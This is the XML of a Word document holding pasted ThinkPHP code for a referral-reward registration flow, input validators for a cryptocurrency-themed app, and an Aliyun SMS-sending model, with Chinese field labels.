    </w:p>
    <w:p w14:paraId="06044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D680BD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B9B67B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1=Db::name('yaoqing')-&gt;where(['uid'=&gt;$s1])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E68F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s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B622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1E60D50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03D907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me=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BDA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insert(['uid'=&gt;$uid,'s1'=&gt;$s1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9C5A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s1)-&gt;setInc('tudi_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E034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config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0245C3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yaoqing']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49671F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14235D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uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDE1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1459B70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yaoqing['money_yaoqing']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CE3C5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请码注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED98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FEFA27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673769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3D6F9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 xml:space="preserve">    if($yaoqing['money_yaoqing_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930ED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_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65198EB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uid'   =&gt;  $s1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20859A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EBF7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money'     =&gt;  $yaoqing['money_yaoqing_s1']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59850DF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   =&gt;  'id:'.$uid.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功邀请徒弟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60761B6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2E06AB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0EAEFA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FF8B3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631C93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uid || !$s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44F3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22362E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39D36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yaoqing=config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F2DC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yaoqing['money_yaoqing']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCB0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money']=$yaoqing['money_yaoqing']*100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A12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948BB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uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FF6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here['s1']=$s1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6D673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Db::nane('yaoqing')-&gt;insert(['uid'=&gt;$uid,'s1'=&gt;$s1,'money'=&gt;0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CB3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f($db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D8A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b::name('yaoqing')-&gt;where('uid',$uid)-&gt;setInc('tudi_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A4AF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06A17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db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111B7E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FC98DD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function _moban(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02540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turn 'toutiao';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF17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29FE77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22286A1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037B7A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in extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B5C4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3BAF22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48CD352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in','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C8F9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5C9CF1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BD6EE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F89CD9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74A01E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3DC5950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Page extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2568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6EEF3D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6B1684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Token'                    =&gt;        'max:128',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F392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s|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页记录条数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'              =&gt;        'number|between:1,100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703734D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age|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                      =&gt;        'number|gt:0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F241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8BFAE6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C920B7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79CFC0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3217209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3C4B3E9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Market extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062272A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7295670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exchange','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F5DA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44D79F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F097D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4A17624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7E234AE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2AFDC1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Remarks extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E806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5757F1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63CC4E1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require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCED8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base','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币为必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499007D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58A844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E0052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D6455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5D2B7E4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6897DA5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ircle extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0C53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6BB18B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12AEF0E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itle|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BB2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ype_id|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID' =&gt; 'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DC566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img|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区图标</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECAA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content|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>描述说明</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944AA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1A56CB5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0EC452D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1CAA50A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validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4F50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0697F5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Coinfollow extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA42E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4B944A4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tected $rule = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F370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token','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041C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ymbol','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF2E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1','float','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C8D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lert2','float','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB92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p>
    <w:p w14:paraId="394EE0C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2211126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lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB951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namespace app\api\model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659287F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Validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177D47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Db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1DE39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use think\Loader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1115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class Send extends \think\Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F214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7713497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sms($data=[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F739A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5C6B44E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alidate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E79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param','require|array','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必须为数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6D79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mobile','require|/1\d{10}$/','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26799CF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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>['template','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228772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414B9F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 (!$validate-&gt;check($data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D209BC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validate-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703BDD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25959CB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onfig = Db::name('member_config')-&gt;where('type','sdkMobile')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA159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Appkey=$config[0]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="530BE88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SecretKey=$config[1]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE52BD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Qianming=$config[2]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF769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Reg=$config[3]['tex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p>
    <w:p w14:paraId="7604CA5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Pwd=$config[4]['tex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p>
    <w:p w14:paraId="30D2EC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Mobile=$config[5]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6B2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nclude EXTEND_PATH.'sms/sdkcore/Config.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB85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er::import('sms.Dysmsapi.Request.V20170525.SendSmsRequest');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FB8B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Loader::import('sms.Dysmsapi.Request.V20170525.QuerySendDetailsRequest');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DD7F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Id = $sdkAppkey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622DAE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cessKeySecret =$sdkSecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02347D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duct = "Dysmsapi";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CFB4C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domain = "dysmsapi.aliyuncs.com";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558162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gion = "cn-hangzhou";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56ECC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profile = \sms\sdkcore\Profile\DefaultProfile::getProfile($region, $accessKeyId, $accessKeySecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C645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sms\sdkcore\Profile\DefaultProfile::addEndpoint("cn-hangzhou", "cn-hangzhou", $product, $domain);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565AD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sClient= new \sms\sdkcore\DefaultAcsClient($profile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB2FF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 = new \sms\Dysmsapi\Request\V20170525\SendSmsRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB80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gt;setPhoneNumbers($data['mobile']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CA4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gt;setSignName($sdkQianming);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B36D1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gt;setTemplateCode($data['template']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C4F2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request-&gt;setTemplateParam(json_encode($data['param']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026C3B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acsResponse = $acsClient-&gt;getAcsResponse($request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30520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if($acsResponse-&gt;Message=='OK'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC78FA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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE49C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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1A19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acsResponse-&gt;Message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356154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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203187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exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE019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isset($result['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920DE6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result['sub_code'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0093F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4A3A662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rue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E52D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alidate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DE0E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param','require|array','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必须为数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A82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mobile','require|/1[34578]{1}\d{9}$/','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F990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template','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDFC98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27446F7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 (!$validate-&gt;check($data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775972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validate-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45357CD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3003996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efine('TOP_SDK_WORK_DIR', CACHE_PATH.'sms_tmp/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1521C97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efine('TOP_SDK_DEV_MODE', false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A65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t>vendor('alidayu.TopClient');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C2F7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endor('alidayu.AlibabaAliqinFcSmsNumSendRequest');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26968F6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endor('alidayu.RequestCheckUtil');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79071BE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endor('alidayu.ResultSet');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7734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endor('alidayu.TopLogger');</w:t>
      </w:r>
    </w:p>
